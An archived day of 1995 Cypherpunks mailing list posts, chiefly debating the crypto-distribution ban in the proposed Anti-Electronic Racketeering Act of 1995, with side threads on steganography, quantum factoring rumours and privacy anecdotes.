To: mclow@coyote.csusm.edu (Marshall Clow)
Subject: Re: Anti-Electronic Racketeering Act of 1995
In-Reply-To: <ac2afc0c00021003cf47@[144.37.6.21]>
Message-ID: <199507131802.NAA01316@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>     IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim
> May, that I have just "distributed computer software .... to a computer
> network ...accessible to foreign nationals ..." even though it was
> "private" e-mail.

It seems to me that this bill is so broad as to be unworkable, and that
could work in our favor.  I haven't read the full text, and I'm not a
lawyer, but my reading of the excerpts posted here suggest that even stuff
that's been *approved* for export by NSA could be prohibited. 

What would be the status of stuff like NIS+ under this bill?  The 
Netscape commerce server?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 13 Jul 95 10:07:54 PDT
To: cypherpunks@toad.com
Subject: full text of the Facism bill
Message-ID: <9507131707.AA12032@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


Full text of the "Facism In America" bill, called by its purveyors an
"anti-racketeering" bill, can be found in...

ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syl Miniter 803-768-3759 <MINITERS@Citadel.edu>
Date: Thu, 13 Jul 95 10:33:18 PDT
To: cypherpunks@toad.com
Subject: who knows about Security First Network Bank
Message-ID: <01HSTNFV105Y8Y5C1T@Citadel.edu>
MIME-Version: 1.0
Content-Type: text/plain


There is an extensive article in the July issue of "Bank Technology News about
a startup Internet bank by the name above.
Does anyone know about this outfit.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Thu, 13 Jul 95 10:42:31 PDT
To: Marshall Clow <mclow@coyote.csusm.edu>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <ac2b06a9060210034dbc@[144.37.6.23]>
Message-ID: <Pine.A32.3.91.950713133947.3360A-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Marshall Clow wrote:

> >    "Sec. 1030A.  Racketeering-related crimes involving computers
> >      "(a) It shall be unlawful--
> >   . . .
> >         "(2) to distribute computer software that encodes or encrypts
> >       electronic or digital communications to computer networks that the
> >       person distributing knows, or reasonably should know, is accessible to
> >       foreign nationals and foreign governments, regardless of whether such
> >       software has been designated nonexportable."
> >
> So much for compression software, too. :-(
> Pst! Anyone want a copy of gzip? PKZip? Drop*Stuff?

Those of you who have done complexity theory will take issue with the 
word 'encode'--the fact that it is binary is an encoding scheme--a simple 
one, but an encoding scheme in a language L2 nonetheless.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 13 Jul 95 11:46:21 PDT
To: cypherpunks@toad.com
Subject: The end of public key cryptography as we know it?
Message-ID: <199507131846.NAA06768@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



An article posted on sci.crypt stated that quantum factoring
is real and that an article was posted in this month's Science
magazine. The author of the post says this would make factoring
a 10 bit number the same time as factoring a 100000000 bit number.

A wonder how long it is before every major government in the world
has one of these. Makes RSA's future kind of moot doesn't it??

I definitely have to read this article, but I thought I'd post it
here for those that weren't aware or that hadn't heard.

I wonder how long it will take before they can figure out how to
do this for other computationally intensinve problems like N-th roots.
(To make Diffie Hellman moot as well).

It's beginning to seem that mathematically challenging algorithms
aren't going to be that challenging for long.  I have no details other
than what is posted here.

Perhaps somebody could post a better synopsis than what was in
sci.crypt? (I plan on reading it for myself anyway, which I imagine
most other people here will be doing as soon as they can)

 Doug Hughes				Engineering Network Services
 doug@eng.auburn.edu			Auburn University



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 13 Jul 95 10:58:09 PDT
To: cypherpunks@toad.com
Subject: VENONA web page
Message-ID: <199507131756.NAA18398@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by jim@acm.org (Jim Gillogly) on Thu, 13 Jul 
10:18 AM

>
>Check out http://www.fas.org/pub/gen/fas/irp/venona/



Amazing IC links from this stepstone. Ebony NRO with a nascent 
homepage!


Must be budget-cut-itis.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 13 Jul 95 11:00:08 PDT
To: cypherpunks@toad.com
Subject: mistake on my part
Message-ID: <9507131759.AA12314@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


I made a small mistake -- the new bill does *not* make it a crime to
make crypto software available at Egghead -- but it does more or less
make distribution of crypto software over the internet impossible if
it isn't an escrow based system.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 13 Jul 95 14:02:33 PDT
To: cypherpunks@toad.com
Subject: speeding detected by civilians
Message-ID: <199507132101.OAA27319@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


hate to start another endless thread on speeding limits, but
this is an interesting privacy anecdote... hope this hasn't
been posted here.


===

From: "Steven M. Horvath" <horvath@comm.mot.com>
Subject: Speeder's Beware of Vernon Hills, IL.
To: snet-l <snet-l@world.std.com>

- - -------- FYI------------------FYI--------------------FYI-----------------

Vernon Hills, IL.

Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
citizens to check out radar guns from the local police department to 
catch speeders in their community. The radar guns are combined with 
cameras in order to instantaneously capture the car, license number, and the 
rate of speed. The citizens can check out the units for a week at a time. The 
police have stated that they, at this time, will use the data to issue 
warning letters to the violaters.






- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 11:08:16 PDT
To: koontz@MasPar.COM
Subject: Re: Anti-Electronic Racketeering Act of 1995
In-Reply-To: <9507131806.AA01162@homeboy.local>
Message-ID: <9507131807.AA12711@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



koontz@MasPar.COM writes:
> >Depends on how "computer network" is defined in the statute.
> 
> Its added language.  "computer network" is not defined.  Catcha' 22.

I just read the bill -- it has no definitions of anything. Very
disturbing.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 12:10:27 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <ac2aab2c0b021004b5fe@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.950713140141.8587C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Timothy C. May wrote:

> I think it's time to abandon all lobbying efforts...they don't appear to be
> working, and the government is proliferating new laws faster than we can
> fight them.
> 
> The only hope is to more rapidly deploy crypto, to reach the "point of no
> return." Optimistically, we may already be there (the views expressed by
> many of us). Pessimistically, the application of RICO laws and civil
> forfeiture could put any of us who advocate crypto use and evasion of the
> new laws into a precarious position.

Unfortunately, a system of social engineering needs to be adopted to get 
massive use of cryptography started.  This means, and I advocated this 
from the day I entered this forum, that programs such as PGP need to be 
redesigned so that the a user friendly . . . so user friendly that any 
Joe Moron can figure out not only how to use them, but also how it helps 
them and how it is "good" for them.  This means that we need simplified 
key management easy enough for the point-and-click masses to utilize.  
This means that common mailing programs, From Elm and Pine to AOLs and 
Computer$erve's mailers need to have TRANSPARENT signing of mail messages 
and near-transparent encryption of messages.  This means that we need to 
stop lobbying the governemtn (they dont' listen) and start lobbying Big 
Business, like IBM, MicroSoft, Apple, etc, to start including encryption 
hooks in their software.  And if PGP is a problem, International PGP 
might be an option.  And if there are problems with patent infringements 
and that kind of crap, then we (the concerned people of the global 
network) need to develop a free encrytion scheme that can do everything 
PGP can do and still be legal.

Unfortuately, all I can do is stand on the sidelines and cheer, because I 
am not a programmer; I'm a user and a teacher.

We've seen the enemy, that the are the 535 senators and representatives 
in D.C., and the staff in the White House.  It's time to shore up our 
allies and enter the battle witht he best weapons we have; information 
and popular use.

> In fact, it's what many of us saw implicit in Clipper.

Yup.  We all saw it with clipper.  We were all called paranoid.

Guess so...

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 13 Jul 95 11:11:57 PDT
To: extropians@panix.com
Subject: New Country Conference
Message-ID: <199507131811.OAA06672@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


I should have mentioned this before but:

New Country Conference

This Saturday July 15th

The New Country Foundation's first annual conference.

Gramercy Park Hotel (Lexington Avenue & 21st Street)
New York City

9:30am

Admission is $35.00 at the door

Speakers:

Mike Oliver, author of "A New Constitution for a New Country."

Richard Morris, President of Sea Structures, Inc. -- Developer of the Seacell floating platform technology.

and a number of others.

Info from Marc Joffe at 71045.142@compuserve.com.

I will be there representing the "New Country in Cyberspace" heresy.

DCF

"Don't waste your time and money forming a new country in the physical realm.   Bits are cheaper than atoms and encrypted bits are stronger than the strongest atoms."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 12:34:28 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: mistake on my part
In-Reply-To: <22250.9507131850@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.ULT.3.91.950713143343.10146B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995 aba@dcs.exeter.ac.uk wrote:

> If they pull this off stage 2, I wonder how long till stage 3, I think
> it'll be time to leave the sinking ship while exit visas are still
> granted!

And go where?  I know i'm living in a shell, but I've never heard a 
difinitive answer of where is a better place to live and still has the 
same or better freedoms.

*serious question*

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Gillman <syshtg@gsusgi2.Gsu.EDU>
Date: Thu, 13 Jul 95 11:39:36 PDT
To: cypherpunks@toad.com
Subject: Grassley's Anti-Ridiculous Act
Message-ID: <199507131839.OAA03488@gsusgi2.Gsu.EDU>
MIME-Version: 1.0
Content-Type: text/plain



OK...let's see...

"shall be unlawful for any person to damage or threaten to
damage electronically or digitally stored data..."

Does that mean i can't erase my floppies anymore? :)
Or, is it that I can't say, "I'm gonna format you!" and then not do it?

Scratching your CDs would be illegal.

When you get down to it, your brain is an electrochemical computer.
You're no longer allowed to forget anything, either.
"But storage in your brain is not digital!", you say..

Electronically _or_ digitally stored.

Swapfiles are right out.

Writeable memory is out in general.

"unlawful to distribute unlicensed software..."

There goes shareware. Freeware's still okay, I guess.
Do many people treat shareware as anything more than freeware?

The Steve JAckson clause at the end about work materials is
cute, but the law doesn't seem to require giving the data back.

And the clause about being able to enter evidence obtained
electronically via 3rd party is interesting. Means an
administrator can legally store email and turn it over...


This bill is so monumentally stupid I can't believe it.

Tom

-- 
 Tom Gillman, Unix/AIX Systems Weenie  |"For a privacy advocate to determine
 Wells Computer Center-Ga. State Univ. |the best way to do key escrow is like
 (404) 651-4503 syshtg@gsusgi2.gsu.edu |a death penalty opponent choosing
 I'm not allowed to have an opinion.   |between gas or electricity"-D.Banisar
                                    
  key to UNIX: echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq'|dc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Thu, 13 Jul 95 12:50:11 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SOL.3.91.950712171632.1850A-100000@use.usit.net>
Message-ID: <Pine.LNX.3.91.950713142925.110D-100000@crl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Brad Dolan wrote:

> ---------- Forwarded message ----------
> Date: Wed, 12 Jul 1995 15:28:25 -0400
> Subject: Anti-Electronic Racketeering Act of 1995
> 
> 
> On June 27, Sen. Grassley introduced extensive criminal amendments to the
> federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
> 1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
> 18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
> (wiretapping), and 42 USC 2000aa (Privacy Protection Act).
> 
> This proposed legislation is Very Bad. It would make all encryption
> software posted to computer networks that are accessible to foreigners
> illegal *regardless of whether the NSA has classified the software as a
> munition!!!*  Here's the language:
> 
>  "Sec. 1030A.  Racketeering-related crimes involving computers
>    "(a) It shall be unlawful--
> 
> . . .
> 
>       "(2) to distribute computer software that encodes or encrypts
>     electronic or digital communications to computer networks that the
>     person distributing knows, or reasonably should know, is accessible to
>     foreign nationals and foreign governments, regardless of whether such
>     software has been designated nonexportable."

en-code (inkoud) pres. part. en-cod-ing past and past part. en-cod-ed to put
into code

code (koud) 1. n. a collection of statutes, rules, etc. methodically arranged
|| an accepted way of signals, Morse code || a system in which arbitrary
values are given to letters, words, numbers or symbols to ensure secrecy or
brevity (cf. CIPHER) 2. v.t. pres. part. cod-ing past and past part. cod-ed
to put (a message) into code || (genetics) to particularize the genetic code
used in synthesizing [F.]

(Source: New Webster's Dictionary and Thesaurus of the English Language,
1993)

Assuming that this isn't contradicted by other parts of the legislation,
doesn't this outlaw distribution "to computer networks" software for
everything from compression to data structures to TCP/IP to ROT13 to PGP? 

The bad part is that they might "compromise" and, by the time its over 
with, it still outlaws non-GAK crypto. At least when its overly broad it 
has a better chance of getting laughed out of court.

The United States Government *is* this stupid. If you are unfortunate 
enough to live within U.S. borders, welcome to hell. *heavy sigh*

--
PGP public key available via finger.	      
GCS/AT d H- s-: g+ p2+ au+ !a w++ v++(--)>! C++++ UL+++>++++ P++ 
L++>+++ 3- E- N+++ K W--(---) M- V-- po--- Y++ t 5+++ j R+++ G 
tv+ b+>++ D B-- e- u*(**) h* f(+) r(-)@ n--->+++ x? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 11:55:51 PDT
To: perry@imsi.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131535.AA12389@snark.imsi.com>
Message-ID: <9507131855.AA04443@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> This law would also criminalize selling crypto software -- even
> emasculated crypto software -- at Egghead, by the way. Remember, even
> *if the crypto software is exportable* its a crime. It also would
> criminalize the distribution of ROT-13. I'm not making either of these
> things up.

Draconian as it is, you seem to be overlooking some of the (ever so faintly)
mitigating clauses of this Grass-t-ley bill. Pre-arranged GAK is an admissible
excuse for dodging the crypto ban, so ROT-13 could still be distributed.

Why do you think Egghead couldn't sell crypto any more ?  It's not a computer
network by any definition I've heard so far.... 

-Futplex <futplex@pseudonym.com>
GAK: it's not just a bad idea, it may soon be the law !



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 13 Jul 95 14:57:46 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <9507131924.AA12834@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950713143406.17575A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> As unpleasant as the congress is, it isn't the enemy. The governmental
> forces desiring control are not the same as the congress.

I'm not so sure.  Both politicos and bureaucrats go into their
respective lines of work for many reasons.  One of the main 
reasons--in my opinion--is a lust to control others.  Being the 
"others," we should resist this tendancy.  This begins with the
realization that most of them *are* the enemy and acting 
accordingly.

> This is not to say that we shouldn't be widely deploying crypto -- we
> should. (Of course, offshore sites will always have crypto available,
> but...) 

Yes, what we really need is easy, drop-in, point-and-click PGP
for the computer neophytes.  And we need to give it away to
all of them.  I wish I know how to accomplish all that.

My "wish list" also includes a fantasy in which someone 
(hopefully, a Cypherpunk) cracks some NSA developed, secret
algorithm, crypto system, preferably causing some sycophantic
company or organization to lose a bundle.  Ah, dreams.


 S a n d y

P.S.  My 84 year old mother went in to buy a refrigerator 
      from Sears or Monkey Wards or whomever.  She picked 
      out a top-of-the-line Tappan.  However, when she was 
      getting ready to pay, the salesperson began to ask
      her a series of questions which included her age and
      social security number.  My mom said, "Just stop
      right there.  If you want to ask all this personal 
      information, I'll just buy it somewhere else."  The
      stopped asking questions and took her check.  

      I think Nancy Reagan had a good idea there.  Just 
      say `NO'.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Stumborg <tbird@eagle.wbm.ca>
Date: Thu, 13 Jul 95 14:00:06 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199507132100.PAA14248@eagle.wbm.ca>
MIME-Version: 1.0
Content-Type: text/plain


send me mail





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 11:57:52 PDT
To: cypherpunks@toad.com
Subject: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <9507131857.AA12796@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, I guess I've been plonked by no less than Tim.

Time will tell which of us is correct.

------- Forwarded Message

To: perry@imsi.com
From: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Crisis Overload (re Electronic Racketeering)

At 6:30 PM 7/13/95, Perry E. Metzger wrote:

>Tim, I respect your opinions a lot, but I don't think you know squat
                                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>about this topic. You don't understand how Washington works. I believe
>I have a better grasp on this than you do. Its hard, but not even
>remotely impossible, to derail this crap. We should make every
>possible effort to do so. The defeatism you are emitting is silly.
                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Perry,

I have all I'm going to take of your acerbic rudeness to me.

I will no longer be responding to any of your messages.

- --Tim

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."



------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 13 Jul 95 15:06:49 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: speeding detected by civilians
In-Reply-To: <199507132101.OAA27319@netcom12.netcom.com>
Message-ID: <Pine.SUN.3.91.950713150252.17575B-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 13 Jul 1995, Vladimir Z. Nuri wrote:

> Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
> citizens to check out radar guns from the local police department to 
> catch speeders in their community. The radar guns are combined with 
> cameras in order to instantaneously capture the car, license number, and the 
> rate of speed. The citizens can check out the units for a week at a time. The 
> police have stated that they, at this time, will use the data to issue 
> warning letters to the violaters.

Great!  I'll take a hundred, please.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 13 Jul 95 13:14:00 PDT
To: Doug.Hughes@eng.auburn.edu
Subject: The end of public key cryptography as we know it?
In-Reply-To: <199507131846.NAA06768@netman.eng.auburn.edu>
Message-ID: <199507132009.AA15283@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Doug Hughes <Doug.Hughes@eng.auburn.edu>
   Date: Thu, 13 Jul 1995 13:46:10 -0500

   An article posted on sci.crypt stated that quantum factoring
   is real and that an article was posted in this month's Science
   magazine. The author of the post says this would make factoring
   a 10 bit number the same time as factoring a 100000000 bit number.

You can bet your ass and your mother's and grandmother's donatable
organs that if this were possible, then the legislative initiatives
currently underway would not be: they'd just let us use RSA and get
a false sense of security.

   A wonder how long it is before every major government in the world
   has one of these. Makes RSA's future kind of moot doesn't it??

Well, it would probably "prove" many-worlds right: in which case
we're probably going to be invaded from the one where the Nazis
won WWII, or the libertarians won Shay's Rebellion.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 13 Jul 95 12:17:24 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: def'n of "computer network"
Message-ID: <Pine.SUN.3.91.950713150101.20411A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bet you 10-1 that "Computer Network" as implemented in the new bill will 
refer to any computing system that could possibly defend /itself/ through 
common carrier status.  IE including small non-networked fringe BBSs that 
attempt to claim "common carrier" status.

And many networks that don't claim common carrier status, too.

The real solution to the crypto-legalization problem is anonymity.  
Seeing as I've not checked the bill out yet, nor am I a lawyer, I can't 
say what the implications for that are.  If there are anti-remailer 
implications, the solution may be to build tools with "security flaws" 
(ie remailing capability).  I know that this has been discussed before, 
but this is the time to implement it.  Obviously, the information about 
the "security holes" will have to be spread widely, but the flaws will 
have to be built so deep in the design as to not be removable.

In addition, now is the time to deploy stego, on a massive scale.  How 
many stego programs have been released for Unix?  Can these be integrated 
with mailing programs in the same way that PGP has been?

What would be the legal liability of the maintainer of a common-carrier 
status system that had a guest account which had been (or based on the 
current legislation) could be used for anonymity/crypto stuff?  If he's 
liable, does this mean that system administrators are liable for any 
potential security hole in their system that a random evil internet 
hacker uses to abuse another system?  Hmmm... Usenet 
alt.binaries.pictures.barney + stego software + unmaintained 'guest' 
account on a random system = ???

Any lawyers?
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 12:25:11 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <Pine.ULT.3.91.950713140141.8587C-100000@krypton.mankato.msus.edu>
Message-ID: <9507131924.AA12834@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Robert A. Hayden" writes:
> We've seen the enemy, that the are the 535 senators and representatives 
> in D.C., and the staff in the White House.  It's time to shore up our 
> allies and enter the battle witht he best weapons we have; information 
> and popular use.

As unpleasant as the congress is, it isn't the enemy. The governmental
forces desiring control are not the same as the congress.

Congressmen are by and large harried and ignorant people. They have no
idea what any of this is about. We have the choice of letting Louis
Freeh do all the educating, or having a white shoe Washington PR firm
do some of the educating, too. I favor the latter approach.

This is not to say that we shouldn't be widely deploying crypto -- we
should. (Of course, offshore sites will always have crypto available,
but...) 

This is also not to say that Congress doesn't pass very bad laws.

However, I very, very strongly urge that we not assume that nothing
can be done. Just winning a couple years time could totally alter the
landscape.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 12:27:49 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: def'n of "computer network"
In-Reply-To: <Pine.SUN.3.91.950713150101.20411A-100000@rwd.goucher.edu>
Message-ID: <9507131927.AA12842@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Jon Lasser writes:
> In addition, now is the time to deploy stego, on a massive scale.

I've said it before, and I'll say it again.

My opinion is that stegonography "standards" are useless. Anyone can
try unpeeling the GIFs and see if something interesting shows up
inside. That means that the only useful stego suffers from the defect
that symmetric key cryptography suffers from -- you have to have made
serious pre-arrangements with the counterparty.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 13 Jul 95 12:34:50 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507131932.PAA01245@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Weld Pond <weld@l0pht.com> responding to

Duncan Frissell <frissell@panix.com> 

<good discussion snipped>

wrote:


>That raises an interesting issue. 

<good discussion snipped>

>Will they have to invent a huge new bureaucracy
>to manage all these devices and programs? 

Talk about a self-answering question...How else could it be done?

>There are many problems with this idea of 
>Government Access to Devices or Programs (GADOP).  

I can think of only one problem with the idea,
it's called the Bill of Rights.
[If there is anything left of it after this session of Congress.]

>A toolset that could build many different encryption 
>and decryption variations based on psuedo-random input
>may be a good tool to fight this nonsense.

Agreed. As well as steganographic software of many kinds
to hide this terrible "crime" we all love to commit, for
the peace loving among us...

BUT [and I hope this doesn't happen.]
I fear that the anarchy resulting from this kind of statist
idiocy will lead many (otherwise peaceful) folks to think that the
only good tool to fight this nonsense is a good shotgun. 
Of course, then we can simply outlaw those, too. 

<good discussion snipped>
Regards,
Jim Ray


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMAVlCG1lp8bpvW01AQEkAgP/doDZKY1TKgBJPy7ame16kbqU0F+BOfl/
wuIkpnsnsoyyV6Fi7KzHPLGsZU+uuMjdxLyOhtmvswKAfq6XU68GTfHuCCImiE8D
6RuaPWkn+eAQmVhXrbmf2ykZwWrnLZ4sT12eyNQjKoavuxTgFPGFqbvIASnIwe/E
OLBNyviUOSA=
=M7wP
- -----END PGP SIGNATURE-----

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAV0pSoZzwIn1bdtAQFPDgGAu5kR4N1OlOm++LZZX4AAraYFbcgwhRiq
qN7x31Enfv4Gaocg0m4TmB4YYdJxyzht
=WV8f
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 13 Jul 95 12:37:18 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: def'n of "computer network"
In-Reply-To: <9507131927.AA12842@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950713152622.22564A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> Jon Lasser writes:
> > In addition, now is the time to deploy stego, on a massive scale.
> 
> I've said it before, and I'll say it again.
> 
> My opinion is that stegonography "standards" are useless. Anyone can
> try unpeeling the GIFs and see if something interesting shows up
> inside. That means that the only useful stego suffers from the defect
> that symmetric key cryptography suffers from -- you have to have made
> serious pre-arrangements with the counterparty.

True, in that sense it's useless.  But if it's PGP'd with a sufficient 
key, nobody can read it.  If it's from a well-overused guest account, 
nobody can find who sent it.  If the picture's not preceded with an 
identification of the intended recipient, and is posted in a public 
forum, then nobody knows who it's for.  Especially if everyone has to 
read it in order to find out if it's for them.

If PGP 3.0 has some sort of option to decrypt messages without PGP 
headers or footers, then the issue ceases to be relevant. Because you've 
stego'd already random-seeming material.  If the stego program is 
integrated with PGP properly, you have public key stegonography.

It's possible; just that somebody's gotta write the damned software.  And 
I'm certainly not capable to do that.  Yet.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
